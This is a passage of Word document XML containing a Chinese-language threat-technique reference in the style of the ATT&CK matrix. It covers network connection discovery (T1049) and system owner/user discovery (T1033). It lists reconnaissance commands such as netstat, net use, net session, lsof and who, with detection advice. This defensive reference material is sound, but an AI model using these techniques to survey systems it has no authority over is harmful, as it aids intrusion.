      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t xml:space="preserve"> API</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>交互</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以收集</w:t>
      </w:r>
      <w:r>
        <w:t>信息</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，也</w:t>
      </w:r>
      <w:r>
        <w:t>可能会</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统管理工具（例如</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows Management Instrumentation</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PowerShell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）来获取信息</w:t>
      </w:r>
      <w:r w:rsidRPr="00C30A40">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507B785A" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="0096095B" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0096095B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>系统</w:t>
      </w:r>
      <w:r w:rsidRPr="0096095B">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>网络连接</w:t>
      </w:r>
      <w:r w:rsidRPr="0096095B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>发现</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="007526C7" w14:paraId="09328BF1" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2BC50218" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="007526C7" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007526C7">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:t>T1049</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3FEE0DB0" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="007526C7" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007526C7">
              <w:t>技术：发现</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A8FF0E8" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="007526C7" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007526C7">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:t>Linux</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:t>macOS</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F19B132" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="007526C7" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007526C7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>所需权限</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:t>：用户，管理员</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="47AFBEDA" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="007526C7" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007526C7">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>进程监控，进程命令行参数</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C399C6B" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="007526C7" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007526C7">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="732F5292" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00F42365" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="797FA9D1" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="002C3384">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可能会</w:t>
      </w:r>
      <w:r w:rsidRPr="002C3384">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>尝试通过查询网络上的信息来获取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>他们所</w:t>
      </w:r>
      <w:r>
        <w:t>入侵系统</w:t>
      </w:r>
      <w:r w:rsidRPr="002C3384">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或远程系统</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发起的</w:t>
      </w:r>
      <w:r>
        <w:t>网络连接</w:t>
      </w:r>
      <w:r w:rsidRPr="002C3384">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>列表。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A29DA7" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4686EAB5" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:rPr>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC3F22">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取此信息的实用程序和命令包括</w:t>
      </w:r>
      <w:hyperlink r:id="rId185" w:history="1">
        <w:r w:rsidRPr="00EC3F22">
          <w:t>Net</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00EC3F22">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC3F22">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>netstat</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC3F22">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC3F22">
        <w:t>net use</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC3F22">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC3F22">
        <w:t>net session</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC3F22">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E6EFD4" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>Mac and Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="768B7C31" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="002C3384">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Mac</w:t>
      </w:r>
      <w:r w:rsidRPr="002C3384">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="002C3384">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统</w:t>
      </w:r>
      <w:r w:rsidRPr="002C3384">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>netstat</w:t>
      </w:r>
      <w:r w:rsidRPr="002C3384">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>lsof</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令可</w:t>
      </w:r>
      <w:r w:rsidRPr="002C3384">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用于列出当前连接。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>who -a</w:t>
      </w:r>
      <w:r w:rsidRPr="002C3384">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>w</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令可</w:t>
      </w:r>
      <w:r w:rsidRPr="002C3384">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用于显示当前登录的用户，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>作用</w:t>
      </w:r>
      <w:r w:rsidRPr="002C3384">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类似于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidRPr="002C3384">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>et session</w:t>
      </w:r>
      <w:r w:rsidRPr="002C3384">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60285E62" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B9B5BD" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这种类型的攻击技术基于系统功能的滥用，无法通过预防性控制来轻松缓解其造成的影响。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7DC8DB" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468F786A" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="005A7988">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统和网络发现技术通常用在攻击者试图了解环境的整个操作</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7988">
        <w:t>过程</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7988">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中。不应孤立地看待数据和事件，而应将其视为可能导致其他活动的一系列行为</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7988">
        <w:t>中的</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7988">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一部分，</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7988">
        <w:t>例如横向移动</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7988">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090B41EB" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="005A7988" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="005A7988">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控进程和命令行参数来查看是否有收集</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7988">
        <w:t>系统和网络信息的行为。</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7988">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7988">
        <w:t>可能会使用</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7988">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>带内置功能的远程访问工具来直接与</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7988">
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7988">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>indows</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7988">
        <w:t xml:space="preserve"> API</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7988">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>交互以收集</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7988">
        <w:t>信息</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7988">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，也</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7988">
        <w:t>可能会</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7988">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7988">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7988">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统管理工具（例如</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7988">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows Management Instrumentation</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7988">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7988">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PowerShell</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7988">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）来获取信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FEC8BD2" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="0096095B" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0096095B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>系统所有者</w:t>
      </w:r>
      <w:r w:rsidRPr="0096095B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="0096095B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>用户发现</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="007526C7" w14:paraId="073896A4" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="00BCBAA7" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="007526C7" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007526C7">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:t>T1033</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63515775" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="007526C7" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007526C7">
              <w:t>技术：发现</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42950596" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="007526C7" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007526C7">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:t>Linux</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:t>macOS</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A0427E0" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="007526C7" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007526C7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>所需</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:t>权限：用户，管理员</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C7ABB27" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="007526C7" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007526C7">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>文件</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:t>监控</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，进程监控，进程命令行参数</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B6AADE5" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="007526C7" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007526C7">
              <w:t>CAPEC</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:t>编号：</w:t>
            </w:r>
            <w:hyperlink r:id="rId186" w:tgtFrame="_blank" w:history="1">
              <w:r w:rsidRPr="007526C7">
                <w:t>CAPEC-577</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="569E0527" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="007526C7" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007526C7">
              <w:lastRenderedPageBreak/>
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="20F7D384" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00310C0B" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E7A42CC" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13616FC4" w14:textId="6A4F4F19" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE06D3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可能会尝试识别主要用户</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE06D3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当前登录的用户</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、常常</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE06D3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用系统的一组用户，或者某个用户是否正在积极使用该系统</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。他们可以</w:t>
      </w:r>
      <w:r>
        <w:t>用不同方法来做到这</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一点</w:t>
      </w:r>
      <w:r>
        <w:t>，比如</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE06D3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检索</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>账号</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE06D3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r w:rsidR="006508E9">
        <w:t>凭据</w:t>
      </w:r>
      <w:r>
        <w:t>导出</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE06D3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者也</w:t>
      </w:r>
      <w:r>
        <w:t>可能会</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE06D3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用其他发现技术以多种不同方式收集信息，因为用户和用户名详细信息在整个系统中都很普遍，并且</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这些</w:t>
      </w:r>
      <w:r>
        <w:t>信息</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE06D3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>包括运行进程的所有权</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE06D3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE06D3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE06D3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
